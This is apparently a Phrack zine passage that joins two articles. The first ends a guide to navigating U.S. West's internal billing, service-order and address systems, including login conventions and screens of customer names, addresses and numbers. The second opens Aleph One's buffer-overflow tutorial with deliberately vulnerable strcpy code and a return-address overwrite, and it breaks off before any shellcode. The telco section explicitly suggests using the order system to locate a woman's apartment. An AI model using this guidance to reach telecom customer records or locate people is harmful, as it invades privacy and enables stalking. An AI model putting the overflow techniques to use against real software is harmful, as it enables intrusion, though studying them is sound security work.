                               (P means there are permanent notations)

Listing types include:

	NP		Non-Published
	NL or NLIST 	Non-Listed
	<null>		Published


Account Status Codes are shown in order of priority.  SNP, SUSP, DISC,
OCAx, LEGX and W-OFF codes are highlighted on the screen.  Account Service
Codes include:

	OCAx	Account has been referred to an outside collection agency
	LEGX	Account has been referred to legal
	W-OFF   Written OFF FINAL BILL
	FIN-R	Revised final bill
	FIN-I	Initial Final Bill
	DISC	Service has been disconnected
	SNP	Service has been interrupted for non-payment
	SUSP	Service has been temporarily suspended at customer request
	INIT	Initial bill
	LIVE	Live bill
	SCD	Select Carrier Denial


Class of Service Codes include:

	1FR	One Flat Rate
	1MR	One Measured Rate
	1PC	One Pay Phone
	CDF	DTF Coin
	PBX	Private Branch Exchange (Direct Inward Dialing ext.)
	CFD	Coinless ANI7 Charge-a-Call
	INW	InWATS
	OWT	OutWATS
	PBM	0 HO/MO MSG REG (No ANI)
	PMB	LTG = 1 HO/MO Regular ANI6

Entity Status is used to restrict access to toll services.  The three digit
carrier code is listed, followed by the letters S, C or F.

If the NT (No Treatment Indicator) is C, the computer sends out a late
notice on the R2 date.  If the NT is T, there is a temporary reprieve and
the computer will not sent out a late notice this month.  If the NT is M or
P, late notices are never sent.

PF11 from this screen will take you through the entity CSBL's.

PF5 will show you the customers Current Service Record.  The CSR screen
will look something like this:

+-----------------------------------------------------------------------------+
|CMD                                           MSG                            |
|(a)303 864 2475 (b)298 NP (c)NOV 10 99    *CSR        (d)P  1  2    DNV 1FR  |
|(e)BARBARA ANDERSON FOR                                                      |
|XSBN 2-864-2475                                                              |
|        (f)---LIST                                                           |
|                  NP   (NP) ANDERSON, DARRYL B                               |
|                  LA   5425 ROWLAND CT                                       |
|        (g)---BILL                                                           |
|                  BN1  BARBARA	ANDERSON FOR                                  |
|                  BN2  DARRYL B ANDERSON                                     |
|                  BA1  5425 ROWLAND CT                                       |
|                  PO   80301 /TAR GQ                                         |
|        (h)---S&E                                                            |
|                                   (i)ORIG SERV ESTAB 8-17-78                |
|(j)     (k)                    (l)                    (m)       (n)          |
|20182   1825                   NPU   /1000            1.31      1.31         |
|41481   7001                   TTR   /1000            1.12      1.12         |
|82585   3793                   1FR   /1000/PICX288    5.60      5.60         |
|41481   2140                   KH9   /1000            .00        .00         |
|22782   5106                   WMR   /1000/D          .56        .56         |
|41481   7001                   RJ11C /1000/D          .00        .00         |
|                                                                             |
|RP      NOTATION               TYPE   PN              ACT FU BD              |
|                                                                  1299       |
+-----------------------------------------------------------------------------+

Legend:	
        (a) Telephone number
	(b) Customer code
	(c) Most current bill date
	(d) Page number
	(e) Billing name
	(f) LIST section containing listed name and address
	(g) BILL section containing billing name and address
	(h) S&E section containing products and service
	(i) Date original service was established
	(j) Date each service was installed
	(k) Last 4 digits of order number that put service online
	(l) USOC's representing the products and services on the account
	    (See below)
	(m) Monthly rate for each USOC
	(n) Amount billed for USOC total

USOC Codes include:

	ESC	Three Way Calling
	ESF	Speed Calling
        ESL     Speed Calling 8 Code
	ESM	Call Forwarding
	ESX	Call Waiting
	EVB	Busy Call Forward
	EVC	Busy Call Forward Extended
	EVD	Delayed Call Forwarding
	HM1	Intercom Plus
	HMP	Intercom Plus
	MVCCW	Commstar II Call Waiting



PF8 allows you to view the notes the telco is keeping on the customer. This
is not a free-form notes screen, but is instead very structured. Notes are
automatically deleted after two months unless the type code PERM is used.

+-----------------------------------------------------------------------------+
|CMD                                           MSG                            |
|303 864 2475 2298 NP 3NOV 10 99    *CSR        P  1  2    DNV 1FR            |
|                                                                             |
|BARBARA ANDERSON FOR                                                         |
|                                                                             |
|DATE  RP     NOTATION                                 USR  TYPE  PN  ACT  FU |
|1209  1988   ESTAB FREE 976 BLOCK 12-9-88             LTR  PERM              |
|0324  BARB   SLD CCS DD 3-1                           SKJ  PSOC              |
|0213  NONE                                            NBV  CHK               |
|0213  BARB   LOST BL ND DUPT SNT ASAP. AGRD ML COPY   NBV  MISC              |
|             TDA. VRFY BL ADDR                                               |
|                                                                             |
|RP           NOTATION                                 TYPE PN  ACT  FU BD    |
|                                                                      1299   |
+-----------------------------------------------------------------------------+

Valid type codes include: 

	MISC	Miscellaneous
	CHK	Account review or pulled up wrong account 
	PERM 	Permanent
	PASS 	Contact Passed Intra Company
	MORE	More data follows on an additional screen
	OTHM	Carrier toll and inquiry
	OHTD	Carrier toll and inquiry
        OTHB    Non-specific billing question
	PSON	New connect, order negotiation
        CPN     New connect, order canceled
	QPON	New connect, order inquiry



CARS
~~~~
CARS (Customer Access and Retrieval System) is used in the Western
Territories of U.S. West.  CARS stores bill and credit information,
equipment information, carrier billing information, customer contact notes
and payment history.  CARS user id's are six characters and normally begin
with a 'B' for business.  CARS passwords (lockwords, in U.S. West parlance)
are from 4 to either characters and must contain at least one alpha and one
numeric character.  CARS passwords expire after 30 days.  You will also be
asked for a Project Code (use 'M'), a Group Code (use 'G') and a Position
#.  The Position # consists of a pair of two character fields.  The first
two characters are the office code and the second two characters identify
the individual employee.  The CARS interface is quite similar to the BOSS
interface.  The function keys for CARS are:

	PF1  = LDD 	(Long Distance Detail)
	PF2  = CSBL 	(Current Status Bill)
	PF3  = BILL 	(Bill Detail)
	PF4  = QTFU 	(Query/Treatment Follow-Up)
	PF5  = CCSR	(Current Customer Service Record)
	PF6  = PREV	(Previous Month's Information)
	PF7  = PADJ	(Payment and Adjustments)
	PF8  = NOTE	(Notations)
	PF9  = ABIL	(Adjustment Bill)
	PF10 = COMPUTE	(Compute)
	PF11 = F/B	(Forward/Back)
	PF12 = BESS	(Billed Entry Status Screen)


PF2 will bring up the CSBL (Current Service Bill) screen, which shows you
the "can be reached" numbers and names for the account you are looking at.

PF5 will bring up the Current Service Record (CSR).  A CARS CSR screen
resembles a BOSS CSR screen:

+-----------------------------------------------------------------------------+
|CMD___________________________________________    Q:                         |
|(a)303 864 2475 (b)2298 72W (c)NOV 10 99  *CCSR* LIVE (d)P00001     COS      |
|(e)BARBARA ANDERSON FOR        SEA 1FB         TAX FSL                       |
|        (f)---LIST                                                           |
|                  NP   (NP) ANDERSON, DARRYL B                               |
|                  LA   5425 ROWLAND CT                                       |
|        (g)---BILL                                                           |
|                  TAR  1700                                                  |
|                  MCN  NXWAC                                                 |
|                  COS  852-9200S                                             |
|                  BN1  BARBARA	ANDERSON FOR                                  |
|                  BN2  DARRYL B ANDERSON                                     |
|                  BA1  5425 ROWLAND CT                                       |
|        (h)---S&E                                                            |
|                  ENT  000                                                   |
|(i)        (j)       (qty)   (k)                         (l)    (tax codes)  |
|02/18/92   05/18/90    1     FB/TN 621-2475/PIC XXX/LPS  42.10     &#        |
|02/16/90   05/18/90    1     HSO/TN 621-2475/SLS          2.00     &#        |
|                             377000                                          |
|02/16/90   02/16/90    1     TTB/TN 621-2475/SLS          0.00     &         |
|                             377000                                          |
|02/16/90   02/16/90    1     9ZR/TN 621-2475/SLS          4.22               |
|                             377000                                          |
|RP-___________NOTE_________________________________________________________  |
|____________________________TYPE_____FLUP_____PN_____ACT_____BD_____USR_____ |
+-----------------------------------------------------------------------------+

Legend:	
        (a) Telephone number
	(b) Customer code
	(c) Most current bill date
	(d) Page number
	(e) Billing name
	(f) LIST section containing listed name and address
	(g) BILL section containing billing name and address
	(h) S&E section containing products and service
	(i) Date original service was established
	(j) Date each service was installed
	(k) USOC's representing the products and services on the account
	(l) Monthly rate for each USOC


Just as with BOSS, PF8 brings up the NOTE screen.  The CARS NOTE screen
differs slightly from the BOSS NOTE screen:

+-----------------------------------------------------------------------------+
|CMD__________________________________________________________           O:   |
|303 864 2475  298 NP  NOV 10 99    *NOTES*        L00001                     |
|BARBARA ANDERSON FOR          SEA 1FB            LC     00     TAX   FSLC    |
|                                                                             |
|DATE  RP     NOTATION                            USR  OFC  TYPE  PN  ACT  FU |
|1209  1991   DISCUSS BILL ONLY WITH BARBARA      LTR  TS1  PERM              |
|0324  BARB   C015364  DD  030199                                             |
|             SLD CCS                             SKJ  D18  PSOC              |
|0213  NONE                                       NBV  TS1  CHK               |
|0213  BARB   LOST BL ND DUPT SNT ASAP. AGRD                                  |
|             ML COPY TDA. VRFY BL ADDR           NBV  TS1  MISC              |
|                                                                             |
|RP           NOTATION                            TYPE  PN  ACT   FU    BD    |
|                                                                      1299   |
+-----------------------------------------------------------------------------+

Valid type codes include: MISC, CHK, PERM and PASS.



                .-------------------------------------.
                | Part II: Service Order Applications |
                `-------------------------------------'

CORD
~~~~
CORD (Customer Order Retrieval and Display) is used in the 206, 503 and 509
NPA's.  CORD has three functions:

        . Accessing service orders by order number
        . Locating order numbers by telephone number
        . Locating order numbers by telephone prefix

Let's say you know that an attractive young lady is moving into your
apartment complex but you don't know her apartment number or her telephone
number.  Connect to CORD and pull up all of the service orders for the
apartment complex's prefix and scan them until you find one in the
apartment complex on or near the date she moved in.  It's much easier if
you have at least a first name.

To use CORD, you will need to know the code for your NPA.  206 is 0, 503 is
5 and 509 is 6.


SOLAR
~~~~~
SOLAR (Service Order Logistics and Reference) is used in Southern 308, 319,
402, 515, 605 and 712.  In addition, SOLAR is used in Northern 218, 507,
612 and 701.  I do not know of an NPA where SOLAR is used exclusively.
SOLAR has two capabilities:

        . Accessing service orders by order number
        . Accessing service orders by telephone number


SOPAD
~~~~~
SOPAD (Service Order Provisioning and Distribution) is used in 208, 303
(TNOland), 307, 406, 505, 602, 719 and 801.  SOPAD has two capabilities:

        . Accessing service orders by order number
        . Accessing service orders by telephone numbers



                .--------------------------------------.
                | Part III: Miscellaneous Applications |
                `--------------------------------------'

PREMIS
~~~~~~
PREMIS (Premises Information System) is a geographical database designed by
BellCore and used by various telco's across the country.  Using Premis, an
employee can do customer lookups by telephone number (CNA), check for
multiple subscribers at an address (upstairs/downstairs), and view account
status.  PREMIS can be used directly, but it is also used by applications
such as SONAR (Service Order Negotiation and Retrieval).

To do successful PREMIS lookups, you will need to be able to encode your
requests in the proper format.  This is very difficult unless to do this on
a regular basis. To make matters more difficult, "proper format" differs
from area to area, even within the same RBOC! Particularly difficult are
trailer parks, nursing homes, military bases and indian reservations.

The PREMIS input screen looks like this:
+-----------------------------------------------------------------------------+
|REQ PREM (a)                                                                 |
|SAGA (b)                                                                     |
|ADDR (c)                                                                     |
|LOC APT (d)                    FLR             BLDG                          |
|AHN (e)                RT      BOX (h)                                       |
|COM (f)        TN (i)            LN (j)                STATUS (k)            |
|                                                                             |
|DAC (g)                                                                      |
+-----------------------------------------------------------------------------+

        (a) Screen name (Request PREMIS)
        (b) Street Address Guide Area (see below)
        (c) Address
        (d) Location or apartment
        (e) Assigned House Number
        (f) Community
        (g) Destination Address Code
        (h) Route and Box
        (i) Telephone Number
        (j) Line Number
        (k) Status

Valid SAGA codes include:

        CHY     Northern Wyoming
        CPR     Southern Wyoming
        DNV     Denver, Colorado
        IDO     Idaho
        MTA     Montana
        NCO     Northern Colorado
        SCO     Southern Colorado
        NMX     New Mexico
        PNX     Phoenix
        TSN     Tucson
        UTA     Utah
        NE      Nebraska


If the PREMIS database was able to understand your query and find the
address information, you will see an output screen that looks like this:

+-----------------------------------------------------------------------------+
|REQ PREM TCAT (a)                 L# 1 BD (b)                                |
|SAGA MN (c)    EMP                   NMX                                     |
|ADDR 7821 LYNDALE AV S                                                       |
|LOC APT 11                     FLR             BLDG                          |
|AHN               RT           BOX                                           |
|COM***BLMGTN                              ST MN                              |
|         TN                       LN                           STATUS        |
|                                                                             |
|DES (d)                                                                      |
|DESCRIP (e) LYNDALE LODGE                                                    |
|    ZIP    55420    EX(f) MPLS  WC(g)  612881  NPA(h) 612   RZ(i)   00  RE(j)|
|     BO             DIR         RTZ(k) 2       CO(l)  881   LCL(m)  1ESS     |
|     PC(n) FDT,SAT  TELF(o)1ES  TAR(p) OTHR    PD(q)                         |
| (r)RMK                                                                      |
|                                                                             |
| (s)RMKT SCD: NPS ATX                                                        |
|                                                                             |
| (t)RMKB LCC IS LCT #                               (v)   (w)   (x)   (y)    |
|    (u)STAT NON-WORK      06-23-96 TN 612 505-1942  CT Y  CNF N DIP N CS 1FR |
|LN JORGENSEN,ROBERT C & DIANE                         MWS NONE               |
|                                                                             |
|DAC (z)                         +PIC          +PIC          +PIC             |
+-----------------------------------------------------------------------------+
     
        (a) Screen name (Request PREMIS Telephone Category)
        (b) Line ID number (Customer's 1st line, 2nd line, etc...)
        (c) Street Address Guide Area
        (d) Descriptive field
        (e) Descriptive address
        (f) Exchange
        (g) Wire Center
        (h) Numbering Plan Area
        (i) Resistance Zone
        (j) Ringer Equivalence
        (k) Rate Zone
        (l) Central Office
        (m) Local (switch type)
        (n) SAT means flow through orders can be negotiated.
            ASAT in this field means Saturday installer visits
            can be negotiated.
        (o) Telephone Features (switch type)
        (p) Tax Code
        (q) Plant District Code
        (r) Remark
        (s) Remark Basic
        (t) Remark Telephone
        (u) Status (see below)
        (v) Connect Through
        (w) Connected Facilities (service uninterrupted from previous tenant)
        (x) Dedicated Inside Plant
        (y) Class of Service
        (z) Destination Address Code

Valid statuses are:

        NON-WORKING     Non-working
        WORKING         Working
        PEND-OUT        Pre-completion disconnect
        SUSPEND         Temporary denial for nonpayment
        UNKNOWN         Unknown



OSCAR
~~~~~
OSCAR (Optical Storage COM Application Replacement) is a application for
archival and retrieval of microfiche files used in customer service. OSCAR
will store the data from BOSS or CARS for up to 30 years.  OSCAR is
operated with these PF keys:

        PF1  = Main Menu
        PF2  = Bill
        PF3  = Print Verification Screen (and duplicate bill printing)
        PF6  = Previous Bill
        PF7  = Next Bill
        PF11 = Forward/Backward

The OSCAR Main Menu will look something like this:
+-----------------------------------------------------------------------------+
|CMD  (a)                                       MSG (e)                       |
|                                                                             |
|                              OSCAR/ONLINE                                   |
|                                  MENU                                       |
|                                                                             |
|       TN: (b)                    CUS:         SUF:                          |
|       DATE: (c)                  PRINT RANGE: (f)     FINAL: (g)            |
|       ACCT CENTER: (d)           SUBPEONA: (h)                              |
|                                                                             |
|                                                                             |
| F1=MENU     F2=BILL     F3=PRINT     F4=N/A       F5=N/A       F6=PREV      |
| F7=NEXT     F8=N/A      F9=N/A       F10=N/A      F11=F/B      F12=N/A      |
+-----------------------------------------------------------------------------+

        (a) Command section
        (b) Customer telephone number
        (c) Date (MMYY)
        (d) Account center              (see below)
        (e) Message section
        (f) Print Range (number of months to print bills for)
        (g) Final (Y for final, blank for not final)
        (h) Reserved for the Subpeona Compliance Group


Account Center codes are:

        CO      Colorado and Wyoming
        NM      New Mexico and Arizona
        NO      North Dakota and Minnesota
        OR      Oregon
        SO      South Dakota, Nebraska, and Iowa
        UT      Utah, Idaho, and Montana
        WA      Washington


PF2 will bring you to the first OSCAR Bill screen, which will look
something like this:

+-----------------------------------------------------------------------------+
|CMD                             MSG                                          |
|                          BILL                             P     1   S   1   |
|                                   BILL DATE:  JUNE 23, 1996                 |
|                                   ACCOUNT NUMBER:                           |
|                                                                             |
|                                        PAYMENT DUE        JUL 12,     1996  |
|    866 W. TNO Ave                                                           |
|    MERIDIAN CO 80301-0869                                                   |
|                                        AMOUNT DUE               $102.88     |
|                                                                             |
|51 03208172009708711   1227021296  000000000000   000000051409               |
|                                                                             |
|PAY U S WEST COMMUNICATIONS                                                  |
|TOTAL DUE                                                                    |
|          *836229150!                                                        |
+-----------------------------------------------------------------------------+

PF11 will take you to the next screen of the bill.  'P' will take you to
the next page of the bill.  'P' followed by a number will take you to that
numbered page.  PF2 will return you to the first screen of the bill.

Here is a sample of the second screen of a bill:

+-----------------------------------------------------------------------------+
|CMD                             MSG                                          |
|                          BILL                             P     1   S   2   |
|                                                           PAGE          1   |
|                                               BILL DATE:  JUN 23, 1996      |
|       MERIDIAN, CO 80301-0869                 ACCOUNT NUMBER:               |
|                                                                             |
|PREVIOUS BILL       PAYMENTS     ADJUSTMENTS  PASTDUE                        |
|      $30.06        $30.06             $0.00  DISREGARD IF PAID  $0.00       |
|                                                                             |
|THANK YOU FOR YOUR PAYMENT             CURRENT CHARGES           $102.88     |
|                                                                             |
|                                       PAYMENT DUE         JUL 12,     1996  |
|                                                                             |
|                                       AMOUNT DUE               $102.88      |
|                                                                             |
|SUMMARY OF CURRENT CHARGES                                                   |
|                                                                             |
|     AT&T..............................................................      |
+-----------------------------------------------------------------------------+


PF3 will bring you to the Print Verification Screen:

+-----------------------------------------------------------------------------+
|CMD                             MSG   PRINT SUCCESSFUL, ENTER NEXT COMMAND   |
|                              PRINT                                          |
|                                                                             |
|303   343   4053   871(a) B DATE:   0696 (b)        FORWARD RANGE: (c)       |
|                                                                             |
|NAME:       KEVIN MITNICK                           NO. OF BILLS: (d)        |
|                                                                             |
|     ADDRESS VERIFICATION                                                    |
|
|L1:  10288 E. 6TH (e)
|L2:  AURORA  CO
|L3:
|L4:
|ZIP: 80010 3612
+-----------------------------------------------------------------------------+

        (a) Customer telephone number and account code
        (b) Bill date
        (c) Number of months to print bills for
        (d) Number of copies to print
        (e) Customer address

Press PF1 to return to the Main Menu or PF3 to print duplicate bills for
mailing to the customer address.

Other useful commands within OSCAR are 'F' for finding strings and 'R'
to repeat a find.  Use the LOFF command to log off.



                .----------------------------------------------.
                | Part IV: Relevant Acronyms and Abbreviations |
                `----------------------------------------------'

ABIL		Adjustment Bill
AC		Account Classification
ANI             Automatic Number Identification
ARBL            As Rendered Bill
ASUM		Adjustments Summary
BD		Bank Draft
BD		Bill Date
BDPP		Bank Draft Payment Plan
BEAR		Billed Entity As Rendered
BESS		Billed Entry Status Screen
BLF             Blocking Failure
BO              Business Office
BOSS		Billing and Order Support System
BP		Bill Period
BSC		Business Service Center
CAMC            Corporate Address Maintenance Center
CARS            Customer Access and Retrieval System
CAS		Customer Approval System
CBR		Can Be Reached
CC		Credit Class
CCH		Calling Cards Held
CCG		Current Charges
CCSR		Current Customer Service Record
CI		Credit Information
CIF		Communications Impaired Fund
CIV		Credit Information Verified
CMC		Credit Management Center
CN		Concession Service
CNA             Customer Name and Address
CNC             Call Not Completed
CNL             Customer Name and Locality
CORD            Customer Order Retrieval and Display
COS		Customer's Other Service
COSMOS		Computer System for Mainframe Operations
CRIS		Customer Record Information System
CSBL		Current Status Bill Screen
CSR		Customer Service Record
CT		Carryover Treat History
CTO             Cut-Off
DAC             Directory Assistance Charges
DAK             Denies All Knowledge
DCK             Dishonored Check History
DDD             Direct Distance Dialing
DEP             Deposit
DN		Denial Notice
DOI		Date Of Installation
DUP             Duplicate Billing
ES              Entity Status
FACS		Facility Administration Control System
FCE             Federal Access Charge
FOMS		Frame Operations Management System
FRN		Franchise Fee
FU		Follow-up
FUSA		Frame User assignment System Access
HB		Held Bill
IC		Itemized Calls
INR             Incorrect Rate
LAL             Local Usage Units Allowed
LCR		Local Usage Units Credited
LCU		Local Units Used
LDD		Long Distance Detail
LDT		Legislative Deaf Tax
LPC		Late Payment Charge
LPC             Loop Provisioning Center
LU              Local Usage
MIG		Message Investigation Center
MIS             Miscellaneous
NOB             Number of Bills
NTN		New Telephone Number
OCC		Other Charges and Credits
OCP		Optional Calling Plan
ONI             Operator Number Identification
OSCAR           Optical Storage COM Application Replacement
OSP             Operator Service Provider
OTN             Old Telephone Number
MPS             Message Processing Service
PADJ            Payments and Adjustments
PB		Pay By Date
PDN		Past Due Notice
PN		Position Number
PPD		Preferred Payment Date
PREMIS		Premisis Information System
PTR             Poor Transmission
QTF             Query Treatment Follow-up
QTFU		Query Treatment Follow-up
RCK		Returned Check History
REB             Rebill
REF             Refuse to Pay
RMKS            Remarks
RP		Responsible Party
RSB		Repair Service Bureau
RSC		Repair Service Center
RT		Remove from Treatment
RTA		Remove from Treatment Amount
S&E		Service & Equipment
SAG             Street Address Guide
SAGA            Street Address Guide Area
TAF             Telephone Assistance Fund
TAP		Telephone Assistance Plan
TAR		Tax Area Code
TCAT            Telephone Category
TIM             Timing
TOPS            Traffic Operator Position System
TRFU            Treatment and Follow-Up
TRMT		Treatment
UBIC		Unbilled Itemized Call
USOC		Universal Service Order Code
PAH		Previous Account History
PIC/PICX	Presubscribed Interexchange Carrier
SCD		Selective Carrier Denial
SI		Supplemental Input
SOLAR		Service Order Logistics and Reference  
SONAR		Service Order Negotiation and Retrieval 
SOPAD		Service Order Provisioning and Distribution 
USF		Universal Service Fund
USOC		Universal Service Order Code
UWM		Unregulated Wire Maintenance
VL		Voice Link
VMS		Voice Messaging Service
WC              Wire Center
WMC             Wire Maintenance Contract
WNO             Wrong Number Reached



                .-----------------.
                | Part V: Credits |
                `-----------------'

Thanks to Crimson Flash for the USOC and Line Class Codes which were taken
from his article "The Fine Art of Telephony" in Phrack 40.

Thanks to Major for his dedication to gathering information.

Thanks to DisordeR for his technical assistance in writing this article.

But most of all... thanks to U.S. West for making this all possible.



--------------------------------------------------------------------------------


                               .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                  File 14 of 16

                      BugTraq, r00t, and Underground.Org
                                   bring you

                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                     Smashing The Stack For Fun And Profit
                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                                 by Aleph One
                             aleph1@underground.org

	`smash the stack` [C programming] n. On many C implementations
	it is possible to corrupt the execution stack by writing past
	the end of an array declared auto in a routine.  Code that does
	this is said to smash the stack, and can cause return from the
	routine to jump to a random address.  This can produce some of
	the most insidious data-dependent bugs known to mankind.
	Variants include trash the stack, scribble the stack, mangle
	the stack; the term mung the stack is not used, as this is
	never done intentionally. See spam; see also alias bug,
	fandango on core, memory leak, precedence lossage, overrun screw.


                                 Introduction
                                 ~~~~~~~~~~~~

   Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited.  Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt 
library, at, etc.  This paper attempts to explain what buffer overflows 
are, and how their exploits work.

   Basic knowledge of assembly is required.  An understanding of virtual 
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating 
system is Linux.

   Some basic definitions before we begin: A buffer is simply a contiguous 
block of computer memory that holds multiple instances of the same data 
type.  C programmers normally associate with the word buffer arrays. Most 
commonly, character arrays.  Arrays, like all variables in C, can be 
declared either static or dynamic.  Static variables are allocated at load 
time on the data segment.  Dynamic variables are allocated at run time on 
the stack. To overflow is to flow, or fill over the top, brims, or bounds. 
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.


                          Process Memory Organization
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~

   To understand what stack buffers are we must first understand how a
process is organized in memory.  Processes are divided into three regions:
Text, Data, and Stack.  We will concentrate on the stack region, but first
a small overview of the other regions is in order.

   The text region is fixed by the program and includes code (instructions)
and read-only data.  This region corresponds to the text section of the
executable file.  This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.

   The data region contains initialized and uninitialized data.  Static
variables are stored in this region.  The data region corresponds to the
data-bss sections of the executable file.  Its size can be changed with the
brk(2) system call.  If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.

                             /------------------  lower
                             |                  |  memory
                             |       Text       |  addresses
                             |                  |
                             |------------------|
                             |   (Initialized)  |
                             |        Data      |
                             |  (Uninitialized) |
                             |------------------|
                             |                  |
                             |       Stack      |  higher
                             |                  |  memory
                             ------------------/  addresses

                         Fig. 1 Process Memory Regions


                               What Is A Stack?
                               ~~~~~~~~~~~~~~~~

   A stack is an abstract data type frequently used in computer science.  A
stack of objects has the property that the last object placed on the stack
will be the first object removed.  This property is commonly referred to as
last in, first out queue, or a LIFO.

   Several operations are defined on stacks.  Two of the most important are
PUSH and POP.  PUSH adds an element at the top of the stack.  POP, in 
contrast, reduces the stack size by one by removing the last element at the 
top of the stack.


                            Why Do We Use A Stack?
                            ~~~~~~~~~~~~~~~~~~~~~~

   Modern computers are designed with the need of high-level languages in
mind.  The most important technique for structuring programs introduced by
high-level languages is the procedure or function.  From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the 
statement or instruction following the call.  This high-level abstraction
is implemented with the help of the stack.

  The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.


                               The Stack Region
                               ~~~~~~~~~~~~~~~~

   A stack is a contiguous block of memory containing data.  A register called
the stack pointer (SP) points to the top of the stack.  The bottom of the 
stack is at a fixed address.  Its size is dynamically adjusted by the kernel 
at run time. The CPU implements instructions to PUSH onto and POP off of the 
stack. 

   The stack consists of logical stack frames that are pushed when calling a
function and popped when returning.  A stack frame contains the parameters to 
a function, its local variables, and the data necessary to recover the 
previous stack frame, including the value of the instruction pointer at the 
time of the function call.

   Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up.  In our examples we'll use a stack that grows
down.  This is the way the stack grows on many computers including the Intel, 
Motorola, SPARC and MIPS processors.  The stack pointer (SP) is also
implementation dependent.  It may point to the last address on the stack, or 
to the next free available address after the stack.  For our discussion we'll
assume it points to the last address on the stack.

   In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame.  Some texts also refer
to it as a local base pointer (LB).  In principle, local variables could be
referenced by giving their offsets from SP.  However, as words are pushed onto
the stack and popped from the stack, these offsets change.  Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required.  Futhermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.

   Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs.  On Intel CPUs, BP (EBP) is used for this 
purpose.  On the Motorola CPUs, any address register except A7 (the stack 
pointer) will do.  Because the way our stack grows, actual parameters have 
positive offsets and local variables have negative offsets from FP.

   The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit).  Then it copies SP into FP to 
create the new FP, and advances SP to reserve space for the local variables. 
This code is called the procedure prolog.  Upon procedure exit, the stack 
must be cleaned up again, something called the procedure epilog.  The Intel 
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions, 
have been provided to do most of the procedure prolog and epilog work 
efficiently. 

   Let us see what the stack looks like in a simple example:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
}

void main() {
  function(1,2,3);
}
------------------------------------------------------------------------------

   To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:

$ gcc -S -o example1.s example1.c

   By looking at the assembly language output we see that the call to
function() is translated to:

        pushl $3
        pushl $2
        pushl $1
        call function

    This pushes the 3 arguments to function backwards into the stack, and
calls function().  The instruction 'call' will push the instruction pointer
(IP) onto the stack.  We'll call the saved IP the return address (RET).  The
first thing done in function is the procedure prolog:

        pushl %ebp
        movl %esp,%ebp
        subl $20,%esp

   This pushes EBP, the frame pointer, onto the stack.  It then copies the
current SP onto EBP, making it the new FP pointer.  We'll call the saved FP
pointer SFP.  It then allocates space for the local variables by subtracting
their size from SP.

   We must remember that memory can only be addressed in multiples of the
word size.  A word in our case is 4 bytes, or 32 bits.  So our 5 byte buffer
is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer
is going to take 12 bytes (3 words) of memory.  That is why SP is being
subtracted by 20.  With that in mind our stack looks like this when
function() is called (each space represents a byte):


bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]
	   
top of                                                            bottom of
stack                                                                 stack


                               Buffer Overflows
                               ~~~~~~~~~~~~~~~~

   A buffer overflow is the result of stuffing more data into a buffer than
it can handle.  How can this often found programming error can be taken
advantage to execute arbitrary code?  Lets look at another example:

example2.c
------------------------------------------------------------------------------
void function(char *str) {
   char buffer[16];

   strcpy(buffer,str);
}

void main() {
  char large_string[256];
  int i;

  for( i = 0; i < 255; i++)
    large_string[i] = 'A';

  function(large_string);
}
------------------------------------------------------------------------------

   This is program has a function with a typical buffer overflow coding
error.  The function copies a supplied string without bounds checking by
using strcpy() instead of strncpy().  If you run this program you will get a
segmentation violation.  Lets see what its stack looks when we call function:


bottom of                                                            top of
memory                                                               memory
                  buffer            sfp   ret   *str
<------          [                ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack


   What is going on here?  Why do we get a segmentation violation?  Simple.
strcpy() is coping the contents of *str (larger_string[]) into buffer[]
until a null character is found on the string.  As we can see buffer[] is
much smaller than *str.  buffer[] is 16 bytes long, and we are trying to stuff
it with 256 bytes.  This means that all 250 bytes after buffer in the stack
are being overwritten.  This includes the SFP, RET, and even *str!  We had 
filled large_string with the character 'A'.  It's hex character value
is 0x41.  That means that the return address is now 0x41414141.  This is
outside of the process address space.  That is why when the function returns
and tries to read the next instruction from that address you get a 
segmentation violation.

   So a buffer overflow allows us to change the return address of a function.
In this way we can change the flow of execution of the program.  Lets go back
to our first example and recall what the stack looked like:


bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack


   Lets try to modify our first example so that it overwrites the return
address, and demonstrate how we can make it execute arbitrary code.  Just
before buffer1[] on the stack is SFP, and before it, the return address.
That is 4 bytes pass the end of buffer1[].  But remember that buffer1[] is
really 2 word so its 8 bytes long.  So the return address is 12 bytes from
the start of buffer1[].  We'll modify the return value in such a way that the
assignment statement 'x = 1;' after the function call will be jumped.  To do
so we add 8 bytes to the return address.  Our code is now:

example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
